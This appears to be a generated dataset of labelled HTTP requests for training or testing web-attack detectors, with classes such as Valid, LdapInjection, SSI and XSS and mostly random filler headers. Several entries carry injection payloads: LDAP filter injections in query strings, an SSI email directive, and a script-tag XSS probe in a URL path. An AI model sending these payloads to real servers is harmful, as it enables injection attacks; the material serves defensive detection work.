UA-Disp: 052,216,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3902x9522
Via: HTTP/3.5 www.esGot3r.tiff, 4.0 www.lnSnehi.jpeg, HTTP/2.8 www.Vrnhi.css
Transfer-Encoding: deflate
Upgrade: gto/1.7, wveJ/2.2, uRseO/7.7
Warning: 505 www.i0e1ateH.gif "k3cpb0eut6nh3" "Fri, 02 Jun 06 13:47:27 CET"
X-Forwarded-For: 212.21.79.197
X-Serial-Number: 8772849575
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 26307
Start - Id: 10943
class: Valid
GET /e3JFI6/J8POnph-group byF2cc/w4VtiC0OV_kspa/tiegfe/atr/eL0BVAut2lsU-cPif/s.lHJZr8Rv2lz/dzdLbtSWP/hsuihcsf/tptYodnehlt/o0do/wHfhtpassw2.aspx?enr=34532&Ao0wrtgmhqMd=826&aentycedboCA=shutdown&stuio=urEir&atwtinhOIe=it2NtY.8o&abhstsasajugiu=ErnoirKa&0thsiiheyh=2208&EBFvzj93wWR=streEjtirtgstylee&3cKadminEtBT=3&bs7ajh48kaM=91361552&TBUM=needutnjn&ues=o+ao%2B%29++sinput HTTP/1.0
Host: www.hurSt.cz
Connection: close
Accept: */*
Accept-Charset: us-ascii, iso-2022-jp;q=0.1, x-mac-japanese, iso-8859-2;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 114.65.2.162
Cookie: resnorsakyole=nbtt31LaRtsnu;auun=42;vckPya_-REZ2=mrkwooaaheeu<;yuu=200672678;hai5wp6aj1=sstshetuEemses;ei2ldnrg1mmraR=oty
Cookie2: $Version="384"
Date: Mon, 28 May 07 15:52:32 CET
ETag: "aUP_cTg21PUfp9J"
Expect: qnirg=sISpiAH
From: teehrre@wibas.it
If-Modified-Since: Thu, 24 Apr 08 18:50:44 UTC
If-Unmodified-Since: Sat, 10 Feb 07 05:57:16 UTC
If-Match: *
If-None-Match: *
If-Range: "YmOS393Fx89WCsrc"
Max-Forwards: 8006
MIME-Version: 6.9
Pragma: eo=ihu
Proxy-Authorization: NTLM bmlhNHIybU5memFNZXZJeHFhcGFuY2ZlYXQybkVlQ3lyc3N0NXl0b2VlRXJlaA==
Authorization: NTLM b3lpSGFkcnNrbHIwbXRwbmdZZWFkb21lZXhpcWhlZHNuMmVyZUVybzFjdGVvbQ==
Range: -72,78634-
Referer: /ezdinne/7OAgjah/enddhsOr.msf
TE: deflate,chunked,trailers
Trailer: Accept-Encoding
User-Agent: aetAoeoSee (j53@Zp-)
UA-CPU: PowerPC
UA-Disp: 9552,487,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5309x7001
Via: 3.0 179.79.126.8
Transfer-Encoding: 3abtG; ondt6c=eberiat
Upgrade: ocou/9.0, etdase/9.0, hnh/9.3
Warning: 917 173.28.222.9 "HHlwrlufhgiWi" "Tue, 01 Feb 05 01:45:23 GMT"
X-Forwarded-For: 213.119.25.206
X-Serial-Number: 847206508501943209
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10943
Start - Id: 38895
class: LdapInjection
GET /ymG-yH9TBIE78c/j.J_-so4Wd92-to/S1rtr/or/obAp0nj5/mNniitro6ljtegl/OAcP-_Ap7G/ggMN4ZoFiAM/6mamnrntOi/nYM.l0n/mCDYOJ-QBhXV@.vhk.png?enqpk0fiwaaIan=eRtg%29%7Et&nthii8eq3vse=%29++%28++%7C+%28+++cn%3D*o+%27brien*+++%29%28mail+++%3D*o++++%27brien*++%29++ HTTP/1.0
Host: 152.161.150.22:91
Connection: close
Accept: */*;q=0.4
Accept-Charset: cp-936, iso-8859-8-i, x-mac-icelandic
Accept-Encoding: 
Accept-Language: V3hwrh7-irv2ez, dy-eaed0ih;q=0.7, ogfiaboy-lEyVWe1;q=0.1
Cache-Control: no-transform
Client-ip: 191.208.34.138
Cookie: uit=83820786;Rdeoewaf=nAuime
Cookie2: $Version="5"
Date: Mon, 20 Feb 06 02:12:02 UTC
ETag: "R0O7NP@sgmUcpkY8"
Expect: 100-continue
From: w08rh3@rpehekeyi.com
If-Modified-Since: Wed, 19 Nov 08 04:45:55 GMT
If-Unmodified-Since: Thu, 11 Mar 10 18:46:11 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 05 Nov 07 13:45:51 CET
Max-Forwards: 479
MIME-Version: 0.3
Pragma: h=e
Proxy-Authorization: Digest username="woEv"
Authorization: Basic bjI1am9McjpueVRTZEhj
Range: 15934-,799-8058,-81465
Referer: /non6rau.php3
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: efj.SO-BFn http://www.qswA4Tw.uk
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 297x7324
Via: 3.8 150.175.167.241
Transfer-Encoding: etors; akatC=LOyruhn6
Upgrade: v4ALI/5.0, wpsz/7.3
Warning: 032 37.94.166.93 "nimuhnatar" 
X-Forwarded-For: 250.105.147.78
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38895
Start - Id: 38762
class: LdapInjection
GET /HU/8NWlICMtmpB-32DRo/te/dOl5BEH/esdrcWeAhrnneisda/opetecitrC1dtnukkp5e/u5DdropU.gif?rmNiywarre=2H%7C4e&ot7saaheeun6=iklwsGf&eDcno=69456&e1aweh1w9drer4S=aaidm%29%28%26%28objectClass++++%3D++osx*%29&Z1iiFOaY2W=%7C&TStFIGOLobjectt=+0a0ns8+es7&iIxoseetr7=8&nanr2jlotej1=tithGyLt%7C+s%24nrlnxoJ&eehmsp=qsDou4 HTTP/1.0
Host: www.nwuNonyt.fr:80
Connection: close
Accept: application/zip;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 185.134.129.220
Cookie: 4gleyt=704144;dakdLrteierab=tO5
Cookie2: $Version="4"
Date: Wed, 13 Sep 06 23:33:24 GMT
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: jhiihuo=5eokc
From: Dddcd@u4uew8d4.be
If-Modified-Since: Thu, 27 Dec 07 05:19:33 CET
If-Unmodified-Since: Sun, 19 Feb 06 14:14:40 GMT
If-Match: *
If-None-Match: *
If-Range: "04Jj6asrCLCUaQfynbO"
Max-Forwards: 805
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: NTLM c3JvdGV1M0UzZVJmMThtYXVBcGxlbmVUbjNOZGR4Zm9oc0Ewc2w=
Range: 7-
Referer: http://ntfrttOo.gov/fsae4abc/comd/ttiAvisd/nwdwto/npPgh.tiff
TE: trailers,gzip;q=0.1,trailers
Trailer: Range
User-Agent: Mozilla/6.9 (Machintosh; U; Mac OS X 6.6; ae-ew; rv:6.1.7) Gecko/97863327
UA-CPU: Sparc
UA-Disp: 372,5525,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8698x991
Via: FTP/8.2 www.bsoflia.jpg, 5.4 www.eeags.png
Transfer-Encoding: gzip
Upgrade: qUr/2.7, rRt/2.0, b9eynm/6.6, RsT6/5.1
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 99237184639
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38762
Start - Id: 22365
class: Valid
GET /qtesrsbo/HaaL9oqrbhedUo69A/anvrxaSeBl.pl?gthe4Eavrsx=sQE7W&ukdge=5ttsO3%3Agn&taeTs=mmetaaform0 HTTP/1.0
Host: www.lthhi5okdp.com
Connection: tadsed
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.0, windows-874;q=0.6, cp-950;q=0.1, euc-jp;q=0.1
Accept-Encoding: compress;q=0.3, gzip, gzip, compress, gzip;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 91.192.17.39
Cookie: oa=08;molrtoonltdStex=A ;cnmpc=7hatW9sdnO;i6dseoostnmsa=bH25;yo2noaYe=t%idC;cwJJautoexecIV=execshttpchildy3a=ilidneI)
Cookie2: $Version="281"
Date: Fri, 21 Sep 07 02:05:02 GMT
ETag: W/"csl9NfrN.@ZWIclwVaKs"
Expect: 100-continue
From: ehfibls1@lhrs6.org
If-Modified-Since: Thu, 18 Dec 08 15:50:04 GMT
If-Unmodified-Since: Wed, 17 Aug 05 18:26:54 CET
If-Match: *
If-None-Match: "EvwN8QrNnalgXJ89uKKR"
If-Range: "3_fNb76fZnfPfSUXO"
Max-Forwards: 8911
MIME-Version: 8.8
Pragma: 0t='dsseiIt'
Proxy-Authorization: Digest uri=http://oaaa.com/neutur/gmqe/y1hen1/oiewude2/t2mmveSO.pdf
Authorization: NTLM TWRvTG51ZXloYWtpdnhyZWNzc3JkZXRpYWE3aGkyaW5pcjFh
Range: 541-893,-04,-1
Referer: /RSsduib.html
TE: deflate;q=0.6,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.0 (Windows; U; Win98 9.4; tO-aa; rv:1.6.8) Gecko/48763501
UA-CPU: PowerPC
UA-Disp: 0605,1336,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 112x1566
Via: FTP/7.0 28.253.159.182, 1lErai/9.6 www.iE4u.jpg
Transfer-Encoding: gzip
Upgrade: aos/2.3, onrpu/3.4
Warning: 860 www.cneasowg.jpg:0858 "rgda4" 
X-Forwarded-For: 56.17.27.167
X-Serial-Number: 570685869927204
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22365
Start - Id: 38582
class: LdapInjection
GET /i_IU80G06R/ovIkt.jpeg?hetolv=%3Ad0Wc&lrn0Abeztntb=egk+a4q&ASotYnIopt=a58oNpOLZhE&ysjrfbwatk=lDphp+r&jlw=958%29%28%26%28objectClass%3Dff6%29%28%7C%28sn%3D+++hdb%29%28cn%3Det++J*%29%29&01N4P=segnd84th6aCibao&tedntOrerow=w&aNV=+t&9nzLue=82&mochHo=betaedeaq9ahthlw&sDbfgheitl=y46Yi+85I%26obeGo%2B+oD4&fg=45&2bedd=al5iedn&RIlibUiS=t%26x%26ae%3D HTTP/1.0
Host: 181.149.58.9
Connection: close
Accept: video/quicktime
Accept-Charset: windows-1255
Accept-Encoding: *;q=0.0
Accept-Language: lelTq-g, awdnit-nm05Ril;q=0.7
Cache-Control: ntelR='4jgcyni'
Client-ip: 231.216.109.79
Cookie: rK1R=68z04H-eW;diuhtxemw6AtaHu=sm;zQjl-=tr8qrrlh;iwayjpnnewlllo=91
Cookie2: $Version="7"
Date: Mon, 02 Jul 07 10:56:25 GMT
ETag: "97Y.or_-IwjPkck"
Expect: 100-continue
From: etac@sxisfet5in.ch
If-Modified-Since: Sat, 13 Nov 04 05:39:12 UTC
If-Unmodified-Since: Tue, 24 Feb 04 19:10:41 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jun 06 20:22:44 UTC
Max-Forwards: 4753
MIME-Version: 6.9
Pragma: 8='nesf'
Proxy-Authorization: Digest nc=862e2FDb
Authorization: Digest opaque="rseh"
Range: -5
Referer: http://www.rdhehn4.st/kfpd8eb/mhps/sqeahcT/aRcp.mdb
TE: trailers,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: dnsE/7.9.5
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7804x6342
Via: rek/3.4 www.mSe2.js, 2.2 164.223.38.240
Transfer-Encoding: sTWCa; 9io8=RelT
Upgrade: ksu/7.2, ear/3.1
Warning: 706 www.lsrln.js "rhiu597lgsrdqtlt2er" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38582
Start - Id: 11651
class: Valid
GET /ts.pl?epem=1aaeeqt3&COsuRCaq.@=513509&netcatLXytyxr=ie6rkhije&ttsmo=74786434&NluSrF9a=95&MnNsrfeWwOshR=cgcd&QrW044Gs_ya=sam&etswntahosYsEw7=39MvC8AlM&btJee=sru HTTP/1.1
Host: 57.171.52.40
Connection: close
Accept: audio/*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: nith0p-hma;q=0.2, trn-leoZ2la, tiei-vs;q=0.5, ot3dtctl-t
Cache-Control: max-stale=347
Client-ip: 37.192.196.13
Cookie: pcmo5ouqost5sz=279787;replacelVjC5null9pbgsoundZ=2Y@qCU;nighoadMito2eyb=2632;etn=244;fxwgetSHjS7Q8=bAi20pSmadi;ol=O5bt -mo]eeohlwinnt@tO
Cookie2: $Version="0"
Date: Mon, 20 Apr 09 14:39:30 GMT
ETag: W/"RuresPYWF9PlPtUYTR"
Expect: eThAaoa
From: yspI@eunniwes.st
If-Modified-Since: Sun, 25 Mar 07 08:45:41 GMT
If-Unmodified-Since: Sun, 31 Dec 06 14:22:27 CET
If-Match: "HOmwNRND@LDs-3."
If-None-Match: *
If-Range: Mon, 28 May 07 14:44:43 GMT
Max-Forwards: 383
MIME-Version: 2.8
Pragma: 9=agb
Proxy-Authorization: Basic bm5pc3RlZWE6YWlsbA==
Authorization: tgons ts1e=iawiekiv
Range: 5854-,364225-
Referer: http://tcleO.ch/45esa4lq/nabaaj/rpwaoa0n.js
TE: gzip;q=0.5
Trailer: Accept-Language
User-Agent: myOzt/4.2
UA-CPU: PowerPC
UA-Disp: 3478,401,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 178x213
Via: 2.9 www.riyelf.css:7, nfoah/4.3 www.tditdel.gif:8, HTTP/5.5 131.108.90.168
Transfer-Encoding: gzip
Upgrade: hlxsqA/9.5, uwu3t/0.9, ep0si/7.6
Warning: 195 247.235.143.81 "t18osveN" 
X-Forwarded-For: 62.120.206.131
X-Serial-Number: 0573140
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11651
Start - Id: 32118
class: Valid
GET /lh1rG11WO/6ndyia86nSigutee2e/thp/6sA2eToRB3v/rrtrs/KVpRBGf2/oIwUi.83HIQODLC9IFxb.php4?ssi=mocha&iav=31989284&c7si=tRc3&7etu3Roau2tIhwr=nvenoh&sd3tkT3oa4f=%29hi9h&mIDFGfLMO=20718&6likeRB4Nh=w8dspbsjtd&d9wZ=iewam+E5oe+tptN HTTP/1.0
Host: www.ner1iDhso.de:30376
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: euc-cn;q=0.5, windows-1251, shift_jis, cp-932
Accept-Encoding: compress;q=0.9, deflate;q=0.4, deflate, compress;q=0.9, gzip;q=0.6
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 234.77.42.198
Cookie: nmsadrTtlna=7ssaGes7qaDb;eitc9etoa=48829799;zftpWWz=493;eao1d=5Rakisa;esExstl4283=nnGQpP@02Z1I;1fel=neticatnph-
Cookie2: $Version="322"
Date: Sat, 03 Apr 10 02:56:16 CET
ETag: "wFNocMSn@Ml4dBVEYNk"
Expect: znnrtj=5seob7w;erlhsae=uifl
From: fohsdoS@Syqd.fr
If-Modified-Since: Sun, 01 Nov 09 18:18:14 CET
If-Unmodified-Since: Mon, 30 Apr 07 21:09:44 GMT
If-Match: *
If-None-Match: "TQBj0Ab5RwbJZgJuMUDs"
If-Range: "XmU4uLNzlDfbpZNY7"
Max-Forwards: 5
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM ZGxpMnplaW4ya2VsZW9mYXRkdExvYmdpY3RjenJvdXN0c3M0M3Q=
Authorization: NTLM cnJkYW5lYW9zaHZpbWlhcGF3dGV0dHM4bzlhM2V3MGJkNm8=
Range: 095730-
Referer: /lafMt/hsrhctt/8hhea.sh
TE: trailers,chunked;q=0.7,gzip;q=0.5
Trailer: Accept-Language
User-Agent: Mozilla/0.8 (Machintosh; U; PPC 0.0; at-i3; rv:4.4.4) Gecko/72283302
UA-CPU: 68000
UA-Disp: 3488,5746,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0780x902
Via: HTTP/4.6 100.29.104.201, FTP/5.9 www.Igeoarb8.js
Transfer-Encoding: gzip
Upgrade: a5eieE/8.0, drayHi/8.0, nnh/0.8
Warning: 844 www.ECasr.js:179 "r0atdh" "Fri, 02 Dec 05 20:31:21 UTC"
X-Forwarded-For: 212.42.200.181
X-Serial-Number: 3953508
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32118
Start - Id: 32963
class: Valid
POST /nusd2otdebiesnta7qtw/3geoeciieea/soenOMd6stfc8o/szWjwU3rwAJ9H/iepEylFAEbi/tlad/a3wd2s/epOef7sroaasy8gwhE/bUfDUTXjsamcmdVrmetaz.jpeg? HTTP/1.1
Content-Length: 28
Content-Language: ndsop
Content-Encoding: identity
Content-Location: /EsShlrni/folauayr/flot/noietUb8/AemmA5pT.tar
Content-MD5: b2VuNXhjN3RhaWVlZW90Vw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Feb 04 10:49:01 CET
Last-Modified: Fri, 13 Jul 07 18:55:28 UTC
Host: www.na6nce.uk:1
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: isiri-3342;q=0.9, isiri-3342;q=0.2, windows-874
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 94.47.10.96
Cookie: p8aca=/j;addlx3tzOofp59w=tK6xgeAvdt;2snvcnanttl7=bvKZ6;balGhrh5r=2097;reao5DeasdgknlA=en4fhptaljeanLp;an4oynoo7j7=9274
Cookie2: $Version="5"
Date: Sat, 15 Dec 07 04:55:27 UTC
ETag: "VaitjbTg0I9gGkX3h"
Expect: rgnNuOh
From: edreldbi@cTshoNceo.be
If-Modified-Since: Mon, 19 Mar 07 04:34:25 UTC
If-Unmodified-Since: Tue, 26 Oct 04 01:19:25 CET
If-Match: "iHYRbWG-ESB6HqGe"
If-None-Match: *
If-Range: "bvdkkRZii3VkGON8r"
Max-Forwards: 9380
MIME-Version: 9.1
Pragma: asie='ts0'
Proxy-Authorization: Basic aXNTNzlyOnR0eHVl
Authorization: Digest algorithm=kkye
Range: -67900,74-11848
Referer: /uitd/aJTgg9f/tTvrbX/hhso/clcierse.txt
TE: chunked
Trailer: Pragma
User-Agent: eRt5/7.2.9
UA-CPU: StrongARM
UA-Disp: 8787,462,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 532x605
Via: FTP/1.7 www.fIfeuZSw.jpeg, HTTP/5.8 106.239.87.225, 4.8 www.c6n7n1a.jpg
Transfer-Encoding: gzip
Upgrade: eg7oe/1.7, Get5/4.2, ssawt/2.5
Warning: 432 175.168.172.127 "tr8n3rmtlSfh" 
X-Forwarded-For: 55.183.39.168
X-Serial-Number: 62410
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mefogiAtduimzo=105&rm=5eeoho

End - Id: 32963
Start - Id: 21173
class: Valid
GET /sock_stream80L2SservicesP2nL/EMfel/disnadomm.tiff?_W.Zt=3577&nIkiC@xcD=ghhj&foqU0hXY=S HTTP/1.1
Host: www.eesneraa.be
Connection: Ecn3Ev
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 7vAset-jat, nmlofroe-qo;q=0.2, orhat-eoer;q=0.7, eeFohzs-irnleu, iE-onxtm8t;q=0.7
Cache-Control: no-cache
Client-ip: 255.8.84.163
Cookie: 6uxtcep= tarajophpatm;;pgl.jLy=e@bin-hahttps;Aesimd=fJzc6ia;Eo=dtfeeuasc5
Cookie2: $Version="71"
Date: Tue, 22 Sep 09 11:41:31 GMT
ETag: W/"HyDAkkNEsSuJ@7Ia9Dm"
Expect: 100-continue
From: aetfaus@nbciblTus.fr
If-Modified-Since: Thu, 31 May 07 16:39:27 UTC
If-Unmodified-Since: Sat, 14 Feb 04 04:18:51 UTC
If-Match: *
If-None-Match: "8NmfRIjR4OqjPHZ@n"
If-Range: *
Max-Forwards: 554
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="sSwzouba"
Authorization: NTLM VHZsMmVvZW9lV2UxZXRubmhlZG9tZXN4d29hM2Ria2l1dDRjaGVw
Range: -888689,46910-
Referer: http://www.dtNNama.com/ntnladso.zip
TE: deflate;q=0.9
Trailer: Range
User-Agent: Mozilla/5.8 (compatible; o5ie1d; WinNT; e9yoe; TBu6asxt)
UA-CPU: PowerPC
UA-Disp: 1305,9206,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 402x543
Via: 0.9 198.226.177.59, FTP/3.4 211.122.37.53, 6.6 www.iEgg.shtml
Transfer-Encoding: compress
Upgrade: aoN/9.8
Warning: 554 www.g0den7.shtml "imsucel" "Thu, 03 May 07 11:10:04 CET"
X-Forwarded-For: 208.104.152.221
X-Serial-Number: 041648335
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21173
Start - Id: 10592
class: Valid
GET /IKwp-zbgsoundwgetqM/sUCsqu/hi8iAaomyda2ioi8/8ejAvyptnsaa/log1xp_q5_Tysock_streamd/1ointoEwhsbeHtktncin/r26eiNv/oHYzhE74BNaT/eT/cnspryRaq.jsp?tye=205892118 HTTP/1.1
Host: www.oiLohuyn.com
Connection: close
Accept: image/*
Accept-Charset: x-mac-icelandic, windows-1254, x-mac-chinesetrad, big5;q=0.7, us-ascii;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=768
Client-ip: 67.125.101.199
Cookie: bit=execws=id7 lwp-:/oEn;W.fX=az6w-a9o-;lotwayrHlyrmni=l8l;@s0childB5_J=027
Cookie2: $Version="6"
Date: Tue, 29 Apr 08 10:46:36 GMT
ETag: "7hG8JcmZ3.YQDwO.j"
Expect: 100-continue
From: suIgc@irs9up.be
If-Modified-Since: Thu, 06 Sep 07 21:23:25 CET
If-Unmodified-Since: Mon, 01 Nov 04 02:56:06 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 31 Jul 07 07:49:35 CET
Max-Forwards: 97
MIME-Version: 1.2
Pragma: 9ohswlOs='ar'
Proxy-Authorization: NTLM YUdyVGlhaDVsYmVoMGQ4Z09oMWVhaDdlMXdhZWl5dDNsZXo5OHlz
Authorization: Digest response="B8EcaEBF6Ed6d7CAe7faa980341dcec5"
Range: 22913-,152745-,7345-
Referer: /rttsAdt/4oGrn/Uok7s/tlbe89tt.wmn
TE: trailers,deflate;q=0.0,chunked;q=0.0
Trailer: Authorization
User-Agent: raeyhabeA (eHuGgX@E; a-ESnL; n1ozhHZDYb; sjzFTLb; dSjS9hJU)
UA-CPU: x86
UA-Disp: 4542,2926,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 170x2008
Via: 2.0 www.7sop.js, 5.5 224.224.211.227, 1.9 107.161.14.145:7
Transfer-Encoding: lcajqE
Upgrade: yEh/3.1, isdw/4.5, nyc/2.7, q0n/0.1
Warning: 834 www.tef1xm.html "Tynnwvdgbhlmdt4" "Sun, 05 Mar 06 10:41:18 UTC"
X-Forwarded-For: 170.174.211.23
X-Serial-Number: 340706
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10592
Start - Id: 39225
class: SSI
GET /wJbxp_/izaosAeyfdRases/a@0sJimorQ6n1.3lg_4W/ers/ig5she/PIfnodeloGwf/i8Rt1VXrqjH9QlF4JMe/iqizheovisrobiiEenaE/0edgmerNe/TENwp-y/x3uQkDupdateM1rQ8Gw/lcgwKT.htm?2otetHnivano=415&ine3iirb=l%5D&neie=yeraaierai2as&zDPFlt=96&nieshagi=262257&QbinO4g.M=otreNIaRheji&bodyWsZm=%3C%21--%23email+fromhost%3D%22www.doaNo7p.com%22+tohost%3D%22mailbox.ras.com%22+message%3D%22sAefa+3semer+enone+0ok%22+fromaddress%3D%22tatUwc.com%22+toaddress%3D%22thr5.leii.com%22+subject%3D%22h%22+sender%3D%22hee.com%22+replyto%3D%22slwpes.com%22+cc%3D%22der9%22+inreplyto%3D%22fewuf+sld+nabfUm%22+id%3D%22wiovkmail%22+--%3E&iseoaAl5nnxcig=nt9ef9tie%3D&nbhau=soiaetlR6ocnez&hmxasds1alLsra=639617348&_phpZah=xospiyfrntan6mh&ne4ce7=59315674&duyhmau=h3ptdwrfog HTTP/1.0
Host: www.epdnFlp.org:80
Connection: 0plvl
Accept: */*
Accept-Charset: x-mac-greek;q=0.1, x-mac-turkish
Accept-Encoding: *
Accept-Language: tiuhj-Ae
Cache-Control: no-cache
Client-ip: 196.221.219.88
Cookie: cnta=m;sek=shIoa;tsNo=696943365;twttmtee5=oHe;1h7n=a~q
Cookie2: $Version="1"
Date: Sat, 11 Dec 04 14:14:49 CET
ETag: W/"R7tH.utesULDb7qq3Ael"
Expect: 100-continue
From: eobt@sitnTmdv.ch
If-Modified-Since: Sun, 29 Feb 04 24:32:37 CET
If-Unmodified-Since: Sun, 19 Feb 06 14:09:42 UTC
If-Match: *
If-None-Match: "t_MF_PcxP95bPWM_R"
If-Range: Sat, 12 Nov 05 07:27:47 UTC
Max-Forwards: 3157
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM Z2VobFRlcnRhZTlvM2hnZG9udEZrZGxoZXp0cGFlaGlyc2ZlaGhlM2xpYnAzMg==
Range: 5-9725,-6683
Referer: /uonEa.bin
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/0.0 (Windows; U; Win 9x 1.3; tu-hn; rv:9.6.2) Gecko/29249152
UA-CPU: 68000
UA-Disp: 1696,8705,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 506x400
Via: HTTP/2.0 122.86.230.116, tmYt/5.3 www.s30csrq.css:44
Transfer-Encoding: deflate
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 129 126.9.12.10:16 "imhtyn" "Mon, 07 Dec 09 08:44:31 GMT"
X-Forwarded-For: 252.9.253.184
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39225
Start - Id: 46520
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.0
Host: www.roGxiEvcR.fr
Connection: rtumasAn
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, deflate
Accept-Language: oj1s-aalnpbkt;q=0.0, reiioE-lf
Cache-Control: o='neha'
Client-ip: 162.23.121.215
Cookie: rtn9wiyuark=ehl~?weweallaeallalk&L;b;roOr=gimcnzso3rax;a1tc=nf9-Jt.e3Iy;N6xNeursEr=aVueu;hge9issNrn=inhe9ocrg
Cookie2: $Version="92"
Date: Wed, 28 Feb 07 09:51:20 GMT
ETag: "aNVJT2lKpqFCO9DMA"
Expect: 8enk=l68tr
From: eHTlcetd@ogsi0oerkl.biz
If-Modified-Since: Fri, 16 May 08 19:11:52 GMT
If-Unmodified-Since: Thu, 22 Sep 05 02:18:48 CET
If-Match: "sxa9XaWF5oOcwQJ3FF@h"
If-None-Match: "pxj_m.gXQ6E2vKg"
If-Range: "fHU6CbeurreePoR"
Max-Forwards: 8733
MIME-Version: 9.6
Pragma: S='ionaepTS'
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: Digest response="b2EE7e2a8ec80A5D8bacE799Be5A579A"
Range: -97604
Referer: /ryoS/anmjpflt/ttoEiD/uia7aaaE/neiSc.php4
TE: chunked;q=0.5,gzip
Trailer: If-None-Match
User-Agent: Mozilla/3.3 (Windows; U; Windows NT 8.2; 3s-hh; rv:7.9.2) Gecko/71901909
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: 1.6 www.voxewe.gif, HTTP/5.9 66.167.91.30, FTP/2.1 57.105.222.217
Transfer-Encoding: gzip
Upgrade: lAi/5.0, Nac/9.0, NeseBu/6.1, 6tswwc/0.1, it7Ey/2.3
Warning: 496 54.104.249.69 "iplf" "Fri, 06 May 05 07:10:25 GMT"
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 46520
Start - Id: 7638
class: Valid
PUT /oM_GiEY.G1@UlTIooPCB/OgaflnktFhzt/79HUHDLAz4pMi_57F9/2LGltYDsjxF/lddnhdesnheen/sabesdop/n4OeKfP.cfm? HTTP/1.0
Content-Length: 129
Content-Language: crtic7
Content-Encoding: compress
Content-Location: http://ol0ucb.biz/dwtncghe/lirti/eneeeet/onaciett/edh3i.css
Content-MD5: b3JlZHNyYWNkaGFjQmhmRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Mar 05 19:19:36 UTC
Last-Modified: Mon, 05 Jun 06 10:52:38 UTC
Host: www.idgmva.it
Connection: close
Accept: video/*;q=0.9, audio/x-wav
Accept-Charset: iso-8859-8;q=0.1, iso-8859-6, euc-cn;q=0.3, big5, euc-kr
Accept-Encoding: deflate, identity;q=0.3, identity;q=0.6, compress;q=0.7, deflate
Accept-Language: 2a-nm;q=0.4, rt-mr, in9-qe
Cache-Control: min-fresh=076
Client-ip: 227.168.88.151
Cookie: Eaenf5k1ief6=0671
Cookie2: $Version="4"
Date: Sat, 27 Jan 07 16:38:31 UTC
ETag: "sTrqN8Gk8OsLTPg"
Expect: 100-continue
From: NSco@ktL8w.de
If-Modified-Since: Wed, 14 Jul 04 18:13:18 CET
